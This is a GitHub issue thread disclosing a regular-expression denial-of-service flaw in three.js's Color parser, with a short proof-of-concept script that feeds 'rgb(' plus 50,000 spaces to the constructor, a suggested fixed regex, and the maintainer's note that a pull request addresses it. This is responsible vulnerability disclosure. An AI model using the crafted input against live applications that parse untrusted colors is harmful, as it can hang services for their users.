### ISSUE TITLE
ReDoS in three

### ISSUE THREAD

**Issue by yetingli** [mrdoob/three.js#21132]
Hi,

I would like to report a Regular Expression Denial of Service (REDoS) vulnerability in three.

It allows cause a denial of service when handling rgb or hsl colors. 

The vulnerable regex is located in https://github.com/mrdoob/three.js/blob/2d04b4b3f584cb602835ad994ed731b89f541365/src/math/Color.js#L166

**To Reproduce**

***Code***

```js
var three = require('three')



function build_blank (n) {
 var ret = "rgb("
 for (var i = 0; i < n; i++) {
  ret += " "
 }

 return ret + "";
}

var Color = three.Color

var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")
```

I am willing to suggest that you replace the regex `/^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/` with `/^((?:rgb|hsl)a?)\(\s*([^\)\s]*)\)/`

**Comment by mrdoob** [comment]
I made a pull request for this: #21142
